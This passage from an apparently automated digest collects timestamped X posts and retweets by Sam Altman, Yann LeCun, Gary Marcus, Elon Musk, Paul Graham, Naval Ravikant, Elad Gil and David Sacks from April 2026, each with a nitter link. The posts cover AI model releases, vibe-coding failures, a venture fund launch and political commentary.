fast?!\n[原文链接](https://nitter.net/sama/status/2048165186482389253#m)\n\n**[2026-04-25T22:01:18+00:00]**\n> R to @sama: (and we will fix the former)\n[原文链接](https://nitter.net/sama/status/2048160448340767038#m)\n\n**[2026-04-25T22:01:08+00:00]**\n> we still get looksmaxxed on frontend a little but we IQmog hard now\n[原文链接](https://nitter.net/sama/status/2048160404376105179#m)\n\n**[2026-04-25T15:31:08+00:00]**\n> 5.5 is so earnest \"little engine that could\" energy\n[原文链接](https://nitter.net/sama/status/2048062261584077149#m)\n\n**[2026-04-24T23:41:49+00:00]**\n> this was a good week. proud of the team. happy building!\n[原文链接](https://nitter.net/sama/status/2047823357635354814#m)\n\n**[2026-04-24T21:17:51+00:00]**\n> GPT-5.5 and GPT-5.5 Pro are now available in the API!\n[原文链接](https://nitter.net/sama/status/2047787124846653895#m)\n\n**[2026-04-24T14:27:13+00:00]**\n> 🫶\n[原文链接](https://nitter.net/sama/status/2047683787828703289#m)\n\n**[2026-04-24T00:33:16+00:00]**\n> RT by @sama: Today we open sourced many of OpenAI's monitorability evaluations. We hope that the research community and other model developers can build upon them and use them to evaluate the monitor…\n[原文链接](https://nitter.net/bobabowen/status/2047473914528563592#m)\n\n**[2026-04-23T19:54:32+00:00]**\n> \"don't retweet this, don't retweet this, don't retweet this...\" ah fuck it, life imitates art.\n[原文链接](https://nitter.net/sama/status/2047403771416940715#m)\n\n**[2026-04-23T19:21:55+00:00]**\n> We tried a new thing with NVIDIA to roll out Codex across a whole company and it was awesome to see it work. Let us know if you'd like to do it at your company!\n[原文链接](https://nitter.net/sama/status/2047395562501411058#m)\n\n**[2026-04-23T19:09:11+00:00]**\n> embers\n[原文链接](https://nitter.net/sama/status/2047392357482639749#m)\n\n**[2026-04-23T18:47:43+00:00]**\n> RT by @sama: there are early signs of 5.5 being a competent ai research partner. several researchers let 5.5 run variations of experiments overnight given only a high level algorithmic idea, wake up …\n[原文链接](https://nitter.net/tszzl/status/2047386955550470245#m)\n\n**[2026-04-23T18:26:18+00:00]**\n> RT by @sama: New in the Codex app: - GPT-5.5 - Browser control - Sheets & Slides - Docs & PDFs - OS-wide dictation - Auto-review mode Enjoy!\n[原文链接](https://nitter.net/ajambrosino/status/2047381565534322694#m)\n\n---\n\n### ✅ @gregbrockman — Greg Brockman(0 条)\n\n---\n\n### ⚠️ @andrejkarpathy — Andrej Karpathy(获取失败)\n\n- 错误: nitter=URLError: ; snscrape=snscrape_unavailable: No module named 'snscrape'; rsshub=HTTPError: HTTP Error 503: Service Unavailable\n\n### ✅ @ylecun — Yann LeCun(19 条)\n\n**[2026-04-26T18:31:11+00:00]**\n> RT by @ylecun: Republicans have been making this argument my entire life. We had 8 years of Clinton, 8 years of Obama, 4 years of Biden— never became a socialism. But you know what we got? More jobs,…\n[原文链接](https://nitter.net/briantylercohen/status/2048469956627468510#m)\n\n**[2026-04-26T17:27:23+00:00]**\n> RT by @ylecun: Trump just fired all 24 members of the National Science Board. Every single one. By email. No warning. No reason given. The board has existed since 1950. The National Science Board is …\n[原文链接](https://nitter.net/Gianl1974/status/2048453901930660058#m)\n\n**[2026-04-26T16:03:04+00:00]**\n> RT by @ylecun: Existential risk mongers are a small, very vocal cult with a lot of very clever online astroturfing skills. Politicians never waste a good fake crisis, which is why they're perfect for…\n[原文链接](https://nitter.net/Dan_Jeffries1/status/2048432684930654430#m)\n\n**[2026-04-26T13:51:41+00:00]**\n> Shooting oneself in the foot? Nope. Shooting oneself in the prefrontal cortex.\n[原文链接](https://nitter.net/ylecun/status/2048399621492236615#m)\n\n**[2026-04-26T06:48:29+00:00]**\n> RT by @ylecun: Never let critical thinking get in the way of extremist fantasy stories. If you're on either side of this slider, congratulations, you may be a child in an adult costume body! Black an…\n[原文链接](https://nitter.net/Dan_Jeffries1/status/2048293118781296734#m)\n\n**[2026-04-25T19:15:22+00:00]**\n> RT by @ylecun: OPINION: \"Trump’s mismanagement has resulted in death, destruction, wasted tax dollars, and a huge loss in respect for the United States — all to accomplish nothing.\" https://ebx.sh/V5…\n[原文链接](https://nitter.net/PhillyInquirer/status/2048118689258487857#m)\n\n**[2026-04-25T16:01:07+00:00]**\n> RT by @ylecun: When MTV News shut down, it felt like decades of culture vanished overnight 🕳️ But over 470,000 pages were already preserved. That history didn’t disappear. It was archived. 📚 Read VAN…\n[原文链接](https://nitter.net/internetarchive/status/2048069805807128734#m)\n\n**[2026-04-24T20:50:37+00:00]**\n> RT by @ylecun: Number of people who go bankrupt every year because of medical bills or illness-related work loss: 🇦🇺 0 🇨🇦 0 🇩🇰 0 🇫🇮 0 🇫🇷 0 🇩🇪 0 🇮🇸 0 🇮🇪 0 🇮🇹 0 🇯🇵 0 🇳🇱 0 🇳🇴 0 🇵🇹 0 🇪🇸 0 🇸🇪 0 🇬🇧 0 🇺🇸 53…\n[原文链接](https://nitter.net/Strandjunker/status/2047780272297382384#m)\n\n**[2026-04-24T19:31:52+00:00]**\n> RT by @ylecun: New episode of The Information Bottleneck is out, this time with @liuzhuang1234 (Princeton). We talked about ConvNeXt and whether architecture still matters; dataset bias and what \"goo…\n[原文链接](https://nitter.net/ziv_ravid/status/2047760455679246500#m)\n\n**[2026-04-24T17:45:08+00:00]**\n> RT by @ylecun: The web is disappearing 🕳️ According to a Pew Research Center report, 26% of pages from 2013-2023 are no longer accessible. But that’s not the whole story. In a new study published in …\n[原文链接](https://nitter.net/internetarchive/status/2047733594064408894#m)\n\n**[2026-04-24T15:23:18+00:00]**\n> RT by @ylecun: 图灵奖获得者、 AI 三大教父之一的 LeCun在达沃斯的发言,算是把整个硅谷的遮羞布扯了。 他说现在整个行业都被LLM彻底洗脑了,所有人都在同一条赛道上互相挖人,谁敢偏离主流谁就被骂落后。 这也是他离开Meta的真正原因,连Meta都已经LLM-pilled,他不想再跟风了。 最扎心的一句话是:纯生成式架构,不管是LLM、VLM还是VLA,永远造不出哪怕猫级的智能…\n[原文链接](https://nitter.net/AYi_AInotes/status/2047697898989572176#m)\n\n**[2026-04-24T14:14:06+00:00]**\n> RT by @ylecun: A mathematician who shared an office with Claude Shannon at Bell Labs gave one lecture in 1986 that explains why some people win Nobel Prizes and other equally smart people spend their…\n[原文链接](https://nitter.net/ihtesham2005/status/2047680485208531152#m)\n\n**[2026-04-24T13:58:49+00:00]**\n> RT by @ylecun: Feel like very few serious people make the argument Britain should develop its own LLM? Certainly not an argument you see made in Westminster often during the sovereignty debate. Also …\n[原文链接](https://nitter.net/Discoplomacy/status/2047676640059154653#m)\n\n**[2026-04-24T11:19:36+00:00]**\n> RT by @ylecun: 1. I never said LLMs were not useful. They are, particularly with all the bells and whistles that are being added to them. I use them. 2. A robot-rich future can't be built with AIs th…\n[原文链接](https://nitter.net/ylecun/status/2047636569767419951#m)\n\n**[2026-04-24T10:30:09+00:00]**\n> RT by @ylecun: 🎓 Register now for ML & Advanced Stats Summer School, an intensive set of courses on theoretical foundations & applications of ML methods & modern stats analysis techniques. With @ELLI…\n[原文链接](https://nitter.net/ELLISforEurope/status/2047624126047670758#m)\n\n**[2026-04-24T06:38:08+00:00]**\n> RT by @ylecun: 🔴 Trump vient de publier sur Truth Social un monologue de 1 500 mots sur le droit du sol, l'ACLU, les Indiens, les Chinois et la \"Savage Nation\". Ce texte inhabituellement long, inhabi…\n[原文链接](https://nitter.net/cginisty/status/2047565736382534091#m)\n\n**[2026-04-23T23:15:06+00:00]**\n> RT by @ylecun: Trump completely passed out, reawakened, then passed out again during today's pressor in the Oval Office. 😂🤣👇\n[原文链接](https://nitter.net/maddenifico/status/2047454244781818205#m)\n\n**[2026-04-23T18:12:46+00:00]**\n> RT by @ylecun: This study is an important part of Vanishing Culture, the new book OUT TODAY from @internetarchive. 🕳️ Read for free or purchase in print ➡️ https://archive.org/details/vanishing-cultu…\n[原文链接](https://nitter.net/internetarchive/status/2047378161860776085#m)\n\n**[2026-04-23T14:27:57+00:00]**\n> RT by @ylecun: The most dangerous thing in Washington right now isn't just the corruption—it's the retaliation against the people who expose it. When government power is used in ways that appear desi…\n[原文链接](https://nitter.net/Weinsteinlaw/status/2047321581966291154#m)\n\n---\n\n### ✅ @GaryMarcus — Gary Marcus(19 条)\n\n**[2026-04-27T14:27:36+00:00]**\n> yep, that’s what I do. I am increasingly concerned that people in China are soaking up my wisdom, while a lot of people in the US try to dismiss me. i don’t think that is going to end well.\n[原文链接](https://nitter.net/GaryMarcus/status/2048771044987777428#m)\n\n**[2026-04-27T13:32:43+00:00]**\n> ⚠️ AI agents are wildly premature technology that is being rolled out way too fast. The deepest lesson about the vibe coded AI agent disaster story that is running around is NOT about losing your dat…\n[原文链接](https://nitter.net/GaryMarcus/status/2048757233174122827#m)\n\n**[2026-04-27T12:48:41+00:00]**\n> R to @GaryMarcus: Stop blaming the users. It’s not that simple:\n[原文链接](https://nitter.net/GaryMarcus/status/2048746152749846549#m)\n\n**[2026-04-27T12:36:05+00:00]**\n> People keep blaming the users for the growing number of vibe-coded reasoners. Doing so is *half* right. Users *are*screwing up - by letting vibe coded stuff access their files, without proper backups…\n[原文链接](https://nitter.net/GaryMarcus/status/2048742983684784239#m)\n\n**[2026-04-27T12:20:17+00:00]**\n> “Vibe coded disasters piling up on Reddit”\n[原文链接](https://nitter.net/GaryMarcus/status/2048739005525877072#m)\n\n**[2026-04-27T03:39:49+00:00]**\n> RT by @GaryMarcus: The greatest con of the decade was calling autocomplete “AI”. The second greatest is calling autocomplete-in-a-loop an “agent”.\n[原文链接](https://nitter.net/atmoio/status/2048608025464705084#m)\n\n**[2026-04-27T02:41:14+00:00]**\n> “Always keep a separate backup.” For sure, every experienced programmer should know this. 𝘉𝘶𝘵 𝘸𝘦 𝘫𝘶𝘴𝘵 𝘤𝘳𝘦𝘢𝘵𝘦𝘥 𝘢 𝘸𝘩𝘰𝘭𝘦 𝘨𝘦𝘯𝘦𝘳𝘢𝘵𝘪𝘰𝘯 𝘰𝘧 𝘷𝘪𝘣𝘦 𝘤𝘰𝘥𝘦𝘳𝘴 𝘸𝘩𝘰 𝘥𝘰𝘯’𝘵. And we now have a legion of synthetic coding…\n[原文链接](https://nitter.net/GaryMarcus/status/2048593283639894520#m)\n\n**[2026-04-27T02:25:10+00:00]**\n> RT by @GaryMarcus: “fails less often than a human does” is a terrible metric. We build deterministic software and test it to destruction to ensure it’s 99.99999 reliable . That’s been the basis of ev…\n[原文链接](https://nitter.net/SteveStricklan6/status/2048589239915577837#m)\n\n**[2026-04-27T01:59:04+00:00]**\n> RT by @GaryMarcus: the beauty of a jagged frontier is that every failure is the user's fault and every breakthrough is the model's glory\n[原文链接](https://nitter.net/suchenzang/status/2048582672163995766#m)\n\n**[2026-04-27T01:48:56+00:00]**\n> RT by @GaryMarcus: I mean AI influencers here and everywhere are screaming you shouldn't get hired if you don't use agentic AI because you're deliberatly slowing everyone down and the moment somethin…\n[原文链接](https://nitter.net/BlackHackOfDoom/status/2048580122521780676#m)\n\n**[2026-04-27T01:44:47+00:00]**\n> RT by @GaryMarcus: The only AGI that Sam Altman is after is Adjusted Gross Income.\n[原文链接](https://nitter.net/FrankRundatz/status/2048579079121555764#m)\n\n**[2026-04-27T01:40:43+00:00]**\n> the difference is that we don’t *hype* giving 12 year-olds bulldozers. *of course* it’s a kind of user error when a model destroys all of user’s data and they didn’t have a backup. that’s the point. …\n[原文链接](https://nitter.net/GaryMarcus/status/2048578055283880296#m)\n\n**[2026-04-27T01:09:02+00:00]**\n> RT by @GaryMarcus: Never ever use generative AI for anything critical. The technology is probablistic all the way down and therefore inherently unreliable. Why is this so hard to understand? It’s wil…\n[原文链接](https://nitter.net/SteveStricklan6/status/2048570082843082905#m)\n\n**[2026-04-27T01:00:07+00:00]**\n> Generative AI as the Hindenberg\n[原文链接](https://nitter.net/GaryMarcus/status/2048567837221089669#m)\n\n**[2026-04-27T00:25:00+00:00]**\n> Is it me or X starting to look like a vibe coded mess? Polls are broken. Accounts are getting hacked. My DMs are full of phishing scams. Basics that used to work no longer work.\n[原文链接](https://nitter.net/GaryMarcus/status/2048558998325166498#m)\n\n**[2026-04-27T00:02:43+00:00]**\n> R to @GaryMarcus: btw polling software is broken! votes aren’t showing, as many folks have noted. eg I see none:\n[原文链接](https://nitter.net/GaryMarcus/status/2048553390540734479#m)\n\n**[2026-04-27T00:00:53+00:00]**\n> Total AI disaster, totally predictable\n[原文链接](https://nitter.net/GaryMarcus/status/2048552931923013916#m)\n\n**[2026-04-26T23:29:20+00:00]**\n> Coders and software engineers ONLY:\n[原文链接](https://nitter.net/GaryMarcus/status/2048544989769257024#m)\n\n**[2026-04-26T20:33:49+00:00]**\n> getting so much phishing email in my X DMs. either a lot of accounts have been hacked or someone has discovered a back door to posting DMs.\n[原文链接](https://nitter.net/GaryMarcus/status/2048500820350750905#m)\n\n---\n\n### ✅ @elonmusk — Elon Musk(18 条)\n\n**[2026-04-27T14:53:45+00:00]**\n> Excellent point\n[原文链接](https://nitter.net/elonmusk/status/2048777628019032335#m)\n\n**[2026-04-27T11:35:33+00:00]**\n> RT by @elonmusk: This is the 7th consecutive week with new reporting that ChatGPT was used in connection with murder or suicide. OpenAI doesn’t “benefit all of humanity.”\n[原文链接](https://nitter.net/KatieMiller/status/2048727747954868342#m)\n\n**[2026-04-27T11:08:22+00:00]**\n> RT by @elonmusk: They arrested the President of the United States of America 4X, charged him 91X, indicted him 4X, spied on his campaign, sabotaged his first term, jailed his supporters, raided his p…\n[原文链接](https://nitter.net/jason_meister/status/2048720909809156378#m)\n\n**[2026-04-27T03:11:45+00:00]**\n> Grok Imagine\n[原文链接](https://nitter.net/elonmusk/status/2048600964102246438#m)\n\n**[2026-04-27T02:26:57+00:00]**\n> Curiosity & adventure are my philosophy https://grok.com/share/bGVnYWN5_d70e0164-cced-4096-99cb-38604067aa7a\n[原文链接](https://nitter.net/elonmusk/status/2048589691054694406#m)\n\n**[2026-04-26T23:22:48+00:00]**\n> Remember this\n[原文链接](https://nitter.net/elonmusk/status/2048543344746250466#m)\n\n**[2026-04-26T22:50:49+00:00]**\n> Grad school indoctrination camps\n[原文链接](https://nitter.net/elonmusk/status/2048535299102265720#m)\n\n**[2026-04-26T21:21:33+00:00]**\n> RT by @elonmusk: 🚨BREAKING: I found Cole Allen's archived tweets. He predicted \"Kamala wins all swing states,\" compared Trump's win to “Nazis getting elected,” and moved to Bluesky. The scary part: h…\n[原文链接](https://nitter.net/KanekoaTheGreat/status/2048512831692452091#m)\n\n**[2026-04-26T17:37:26+00:00]**\n> Accurate\n[原文链接](https://nitter.net/elonmusk/status/2048456433981591867#m)\n\n**[2026-04-26T17:27:34+00:00]**\n> RT by @elonmusk: Falcon 9 launches 25 @Starlink satellites from California\n[原文链接](https://nitter.net/SpaceX/status/2048453949381091634#m)\n\n**[2026-04-26T17:05:40+00:00]**\n> RT by @elonmusk: In shocking news, calling your political opponents Nazis makes crazy people want to kill them. Who could have predicted this?\n[原文链接](https://nitter.net/KonstantinKisin/status/2048448438715445382#m)\n\n**[2026-04-26T16:14:38+00:00]**\n> RT by @elonmusk: 25% of very liberal people say political violence can “sometimes be justified.” Among very conservative people it’s just 3%. In other words, the far left is 8x more likely to support…\n[原文链接](https://nitter.net/RobertMSterling/status/2048435593244237849#m)\n\n**[2026-04-26T15:48:07+00:00]**\n> If they’re willing to die to assassinate, imagine what they will do if they gain political power\n[原文链接](https://nitter.net/elonmusk/status/2048428921536868583#m)\n\n**[2026-04-26T15:42:09+00:00]**\n> RT by @elonmusk: Deployment of 25 @Starlink satellites confirmed\n[原文链接](https://nitter.net/SpaceX/status/2048427420366324024#m)\n\n**[2026-04-26T13:13:50+00:00]**\n> RT by @elonmusk: How do you think the left redistributes wealth? Violence How do you think the left seizes the means of production? Violence How do you think they censor and surveil opponents? Violen…\n[原文链接](https://nitter.net/TheAliceSmith/status/2048390094529216982#m)\n\n**[2026-04-26T05:24:02+00:00]**\n> Yeah\n[原文链接](https://nitter.net/elonmusk/status/2048271866914083172#m)\n\n**[2026-04-26T05:21:53+00:00]**\n> Major\n[原文链接](https://nitter.net/elonmusk/status/2048271324577952130#m)\n\n**[2026-04-26T05:02:42+00:00]**\n> RT by @elonmusk: \"You can make an AI go insane if you force it to believe things that aren't true - AI must be maximally truth-seeking\" —Elon Musk\n[原文链接](https://nitter.net/XFreeze/status/2048266495059181608#m)\n\n---\n\n### ✅ @paulg — Paul Graham(20 条)\n\n**[2026-04-27T10:01:28+00:00]**\n> One of my favorite pictures. A guy I didn't know took it of us on a street in Palo Alto about 10 years ago.\n[原文链接](https://nitter.net/paulg/status/2048704073356935676#m)\n\n**[2026-04-27T09:50:40+00:00]**\n> You never need to describe something as a \"bad take.\" If it's false or irrelevant or omits something important, you can just say so. And if it's true, relevant, and complete, it's not a bad take.\n[原文链接](https://nitter.net/paulg/status/2048701354672050286#m)\n\n**[2026-04-27T08:17:48+00:00]**\n> Worrying that your startup will be eaten by the model companies is like worrying that your life will be constrained after you become a movie star. You're far more likely simply to fail.\n[原文链接](https://nitter.net/paulg/status/2048677984106664227#m)\n\n**[2026-04-27T04:08:42+00:00]**\n> RT by @paulg: Whenever I go to Paris to talk about investing in YC startups, I'm always amazed how much the French just LOVE Y Combinator. Nous t'aimons aussi, France. My French friend of @Fundoraclu…\n[原文链接](https://nitter.net/jasonfreedman/status/2048615296613937201#m)\n\n**[2026-04-26T14:48:06+00:00]**\n> RT by @paulg: Yeah okay, Lego bros, brodettes and brotheys are cooked with this one. GPT 2 Image can create full Lego sets! With actual Bricklink IDs so you can order the parts and build it. Whole ne…\n[原文链接](https://nitter.net/DennisonBertram/status/2048413815675539816#m)\n\n**[2026-04-26T14:47:09+00:00]**\n> Every post, I block and report a couple accounts using AI-generated replies. It feels much the same as picking up litter on a city street; I don't know if it has any effect, but it feels like I ought…\n[原文链接](https://nitter.net/paulg/status/2048413578789634100#m)\n\n**[2026-04-26T14:40:28+00:00]**\n> Durer was the original Dr Seuss.\n[原文链接](https://nitter.net/paulg/status/2048411898081583547#m)\n\n**[2026-04-26T14:36:59+00:00]**\n> Writing a talk to give in Stockholm. The prospect of speaking to a large group of people is no longer frightening, but writing a talk is as much work as ever. I'm no longer afraid of audiences, but I…\n[原文链接](https://nitter.net/paulg/status/2048411021329453562#m)\n\n**[2026-04-26T13:37:21+00:00]**\n> RT by @paulg: 'Action is now needed': Over 60 ex-U.K. ambassadors call to sanction Israel over West Bank https://www.haaretz.com/west-bank/2026-04-26/ty-article/.premium/over-60-ex-uk-ambassadors-cal…\n[原文链接](https://nitter.net/haaretzcom/status/2048396013816152216#m)\n\n**[2026-04-26T11:57:10+00:00]**\n> Good use of camouflage by Biscuit.\n[原文链接](https://nitter.net/paulg/status/2048370801833828507#m)\n\n**[2026-04-25T14:17:57+00:00]**\n> RT by @paulg: Journalists worldwide should stand up for colleagues who are murdered.\n[原文链接](https://nitter.net/NickKristof/status/2048043843690561556#m)\n\n**[2026-04-25T13:02:57+00:00]**\n> Edith and Shahed from Noora Health came to visit. They've saved over 75,000 lives so far. A small city of people.\n[原文链接](https://nitter.net/paulg/status/2048024967996993760#m)\n\n**[2026-04-25T12:34:34+00:00]**\n> RT by @paulg: Here's YC's official advice about being truthful and precise about what is pilot, bookings, revenue and recurring revenue. Founders, particularly first time founders, need to sear this …\n[原文链接](https://nitter.net/garrytan/status/2048017824895909901#m)\n\n**[2026-04-25T12:32:40+00:00]**\n> Whoah, self-driving cars compete with airlines. I never considered that till now.\n[原文链接](https://nitter.net/paulg/status/2048017345000415744#m)\n\n**[2026-04-25T10:55:23+00:00]**\n> RT by @paulg: 23 years old with no advanced mathematics training solves Erdős problem with ChatGPT Pro. \"What’s beginning to emerge is that the problem was maybe easier than expected, and it was like…\n[原文链接](https://nitter.net/Ananyo/status/2047992864118894954#m)\n\n**[2026-04-25T08:33:48+00:00]**\n> RT by @paulg: GitHub outages since Microsoft acquisition 🤣\n[原文链接](https://nitter.net/vaggelisdrak/status/2047957234664030380#m)\n\n**[2026-04-25T07:44:30+00:00]**\n> Hamming's talk is so important that I reproduced it on my site. It's one of the only things on my site written by someone else. https://paulgraham.com/hamming.html\n[原文链接](https://nitter.net/paulg/status/2047944827887591681#m)\n\n**[2026-04-25T07:35:28+00:00]**\n> R to @paulg: Auction houses could fix this by giving you timegrapher numbers. But the only auction house that does this so far is a small Swiss one that specializes in watches (Ineichen). None of the…\n[原文链接](https://nitter.net/paulg/status/2047942555254288757#m)\n\n**[2026-04-25T07:30:15+00:00]**\n> The best way to buy art is at auction, once you know what you're doing. But old watches you should buy from dealers. You can get enough information about paintings to judge their condition, but you h…\n[原文链接](https://nitter.net/paulg/status/2047941243234107691#m)\n\n**[2026-04-24T19:36:00+00:00]**\n> RT by @paulg: BREAKING: A Syrian billionaire needed U.S. sanctions lifted so he could cash in on $12 billion in reconstruction contracts, per NYT. In an attempt to influence American foreign policy, …\n[原文链接](https://nitter.net/unusual_whales/status/2047761493274571036#m)\n\n---\n\n### ✅ @naval — Naval Ravikant(11 条)\n\n**[2026-04-24T11:53:43+00:00]**\n> RT by @naval: Fundrise VCX is exactly why USVC needs to exist. Retail wants access to OpenAI, Anthropic, SpaceX, xAI, etc. That demand is not going away. VCX turned that demand into a liquid public w…\n[原文链接](https://nitter.net/alexbass/status/2047645157080658335#m)\n\n**[2026-04-24T05:39:10+00:00]**\n> R to @naval: x.com/avlok/status/204754692…\n[原文链接](https://nitter.net/naval/status/2047550896670908809#m)\n\n**[2026-04-24T05:23:22+00:00]**\n> RT by @naval: I’ve seen a lot of questions about USVC, AngelList’s newest product. First, don’t invest in venture capital if you can’t afford to lose your money. Put your savings somewhere safer. But…\n[原文链接](https://nitter.net/avlok/status/2047546920747307466#m)\n\n**[2026-04-24T03:37:14+00:00]**\n> Hari nails it: “Don’t listen to people who don’t know how private markets work.”\n[原文链接](https://nitter.net/naval/status/2047520212787015748#m)\n\n**[2026-04-24T03:33:25+00:00]**\n> R to @naval: x.com/haridigresses/status/2…\n[原文链接](https://nitter.net/naval/status/2047519250433421604#m)\n\n**[2026-04-24T02:58:19+00:00]**\n> R to @naval: x.com/nivi/status/2047471220…\n[原文链接](https://nitter.net/naval/status/2047510419565420779#m)\n\n**[2026-04-24T01:01:28+00:00]**\n> RT by @naval: USVC is a new fund being offered by Naval, it's been discussed widely on X. I have some thoughts and why people should look into it. I have no connection with it and not being paid to s…\n[原文链接](https://nitter.net/Cernovich/status/2047481012826124516#m)\n\n**[2026-04-24T00:22:33+00:00]**\n> RT by @naval: I spent the morning digging into USVC fees. TLDR: In my opinion, there is no lower-cost way to invest in VC other than becoming one. I’m expecting to pay the same or less than it costs …\n[原文链接](https://nitter.net/nivi/status/2047471220451578132#m)\n\n**[2026-04-23T15:20:52+00:00]**\n> RT by @naval: We launched USVC yesterday and it was one of the most fun days of my career Thousands of people ended up subscribing for literally tens of millions of dollars While most of the receptio…\n[原文链接](https://nitter.net/ankurnagpal/status/2047334901033123913#m)\n\n**[2026-04-22T16:34:52+00:00]**\n> Introducing USVC - a single basket of high-growth venture capital, for everyone. No accreditation required, SEC-registered, and a very low $500 minimum. Includes OpenAI, Anthropic, xAI, Sierra, Cruso…\n[原文链接](https://nitter.net/naval/status/2046991137022648800#m)\n\n**[2026-04-22T14:36:51+00:00]**\n> RT by @naval: Announcing my new thing: I'm launching a new public venture fund USVC is built by AngelList with @naval shaping our investment strategy in the technology companies building our future A…\n[原文链接](https://nitter.net/ankurnagpal/status/2046961436593713241#m)\n\n---\n\n### ✅ @eladgil — Elad Gil(20 条)\n\n**[2026-04-26T02:40:47+00:00]**\n> Saturday song https://youtu.be/D8MoLNxLE98?si=yRsm9viuy3NYvnJ0\n[原文链接](https://nitter.net/eladgil/status/2048230781739581745#m)\n\n**[2026-04-24T18:44:49+00:00]**\n> RT by @eladgil: Adopting Claude speak in my regular life, episode 1: Partner: Did you do the dishes tonight? Me: Yes they're done. Partner: Why are they still dirty? Me: You're right to push back. I …\n[原文链接](https://nitter.net/awnihannun/status/2047748613976264835#m)\n\n**[2026-04-24T01:35:02+00:00]**\n> New life plan- Move to Brooklyn Get neck tat Ride bike everywhere Cold brew own coffee (also start drinking coffee) Adopt 12 year old stray cat, name him Nietzsche Vape mango pods, but ironically Wea…\n[原文链接](https://nitter.net/eladgil/status/2047489459378397604#m)\n\n**[2026-04-23T21:04:47+00:00]**\n> RT by @eladgil: How does one make sense of SF? We are living through the craziest computing revolution of the last 2 decades....and 95% of the value being created is within a 4-mile radius in SF (h/t…\n[原文链接](https://nitter.net/adityaag/status/2047421448449630379#m)\n\n**[2026-04-23T17:55:03+00:00]**\n> Entrepreneurship is a distributed search job across the surface of commercial opportunities\n[原文链接](https://nitter.net/eladgil/status/2047373700643844303#m)\n\n**[2026-04-23T17:20:32+00:00]**\n> Big congrats\n[原文链接](https://nitter.net/eladgil/status/2047365014500389353#m)\n\n**[2026-04-23T17:19:56+00:00]**\n> My view is the AI boom will only accelerate and is a once in a lifetime transformation This is orthogonal to whether many AI companies should exit in next 12-18 months, as some may lack durability vs…\n[原文链接](https://nitter.net/eladgil/status/2047364865527075139#m)\n\n**[2026-04-22T20:39:39+00:00]**\n> <3 @infisical\n[原文链接](https://nitter.net/eladgil/status/2047052737762980083#m)\n\n**[2026-04-21T22:45:48+00:00]**\n> What a time to be alive\n[原文链接](https://nitter.net/eladgil/status/2046722094348771758#m)\n\n**[2026-04-21T20:58:54+00:00]**\n> 👀\n[原文链接](https://nitter.net/eladgil/status/2046695194054320150#m)\n\n**[2026-04-21T19:36:05+00:00]**\n> The dark alchemy that is loonen sparkling + salt of the earth electrolytes 😱\n[原文链接](https://nitter.net/eladgil/status/2046674350993223784#m)\n\n**[2026-04-21T17:21:44+00:00]**\n> AI for email++\n[原文链接](https://nitter.net/eladgil/status/2046640542218604783#m)\n\n**[2026-04-20T23:50:03+00:00]**\n> 🔥\n[原文链接](https://nitter.net/eladgil/status/2046375878368940239#m)\n\n**[2026-04-20T18:51:07+00:00]**\n> R to @eladgil: Link to fuller post: https://substack.com/home/post/p-194229552?source=queue\n[原文链接](https://nitter.net/eladgil/status/2046300649483374704#m)\n\n**[2026-04-20T17:46:29+00:00]**\n> Here is the sbstack version \"Random thoughts while gazing at the misty AI Frontier\" https://blog.eladgil.com/p/random-thoughts-while-gazing-at-the\n[原文链接](https://nitter.net/eladgil/status/2046284381439103043#m)\n\n**[2026-04-20T17:45:44+00:00]**\n> R to @eladgil: 13/12 Anti-AI regulation & violence will both increase It is important for leaders in tech and AI to point out the benefits of AI to society and the world more aggressively\n[原文链接](https://nitter.net/eladgil/status/2046284194943500453#m)\n\n**[2026-04-20T17:45:44+00:00]**\n> R to @eladgil: 12/12 Most AI companies should consider exiting in the next 12-18 months\n[原文链接](https://nitter.net/eladgil/status/2046284191885922498#m)\n\n**[2026-04-20T17:45:43+00:00]**\n> R to @eladgil: 11/12 AI is about selling work, not software. Units of labor as the product This is a big shift in TAM, agents, how to build product in the AI era. Many AI markets are 10-100X the size…\n[原文链接](https://nitter.net/eladgil/status/2046284190132609299#m)\n\n**[2026-04-20T17:45:43+00:00]**\n> R to @eladgil: 10/12 Harness creating more and more stickiness to models If you look at the use of AI coding tools, the harness (and broader product surface area eg UX, workflow, etc) seems to be inc…\n[原文链接](https://nitter.net/eladgil/status/2046284188622737554#m)\n\n**[2026-04-20T17:45:42+00:00]**\n> R to @eladgil: 9/12 Artisanal engineers will be be increasingly unhappy inside companies. Deep artisanal “my code is my craft” and “I love creating bespoke things” engineers decreasingly happy in wor…\n[原文链接](https://nitter.net/eladgil/status/2046284184877187540#m)\n\n---\n\n### ✅ @DavidSacks — David Sacks(19 条)\n\n**[2026-04-26T20:42:24+00:00]**\n> MSM hoax factories like the Atlantic love to allege conflicts of interest without ever disclosing their own.\n[原文链接](https://nitter.net/DavidSacks/status/2048502978626113625#m)\n\n**[2026-04-26T17:37:26+00:00]**\n> RT by @DavidSacks: Accurate\n[原文链接](https://nitter.net/elonmusk/status/2048456433981591867#m)\n\n**[2026-04-26T15:03:35+00:00]**\n> RT by @DavidSacks: Cole Allen, the gunman from last night’s WH Correspondents Dinner, maintained an active online presence, especially on the leftwing social media platform Bluesky where he went by t…\n[原文链接](https://nitter.net/AndrewKolvet/status/2048417712439689346#m)\n\n**[2026-04-25T18:47:09+00:00]**\n> RT by @DavidSacks: .@POTUS: \"We want to beat China at the industry. We're leading with crypto, we're leading with AI, and I really feel I have an obligation... as a President, I have to be able to ma…\n[原文链接](https://nitter.net/RapidResponse47/status/2048111588930986354#m)\n\n**[2026-04-25T13:54:41+00:00]**\n> RT by @DavidSacks: Probably the best take I have heard on why there is so much fear around software exposure in private equity and credit because of AI From David Sacks \"Historically we only had two …\n[原文链接](https://nitter.net/BoringBiz_/status/2048037985765949537#m)\n\n**[2026-04-25T03:16:09+00:00]**\n> RT by @DavidSacks: Incredible return on investment! 💰💰💰\n[原文链接](https://nitter.net/elonmusk/status/2047877294476116184#m)\n\n**[2026-04-25T02:52:39+00:00]**\n> SPLC invested $270k in Charlottesville and got $81 million in additional donations. Extraordinary returns.\n[原文链接](https://nitter.net/DavidSacks/status/2047871382923469241#m)\n\n**[2026-04-25T02:37:36+00:00]**\n> Marc Benioff is the apex cloud founder. He and Salesforce have turned every previous technology wave to their advantage. Cloud, social, mobile, big data. I predict AI will be no different.\n[原文链接](https://nitter.net/DavidSacks/status/2047867592790946189#m)\n\n**[2026-04-25T00:55:54+00:00]**\n> RT by @DavidSacks: SACKS: “We're really lucky that [Trump] is President … when this AI revolution is happening.” JASON: “What would happen if Kamala ‘Ding Dong’ was in right now?” SACKS: “We'd have 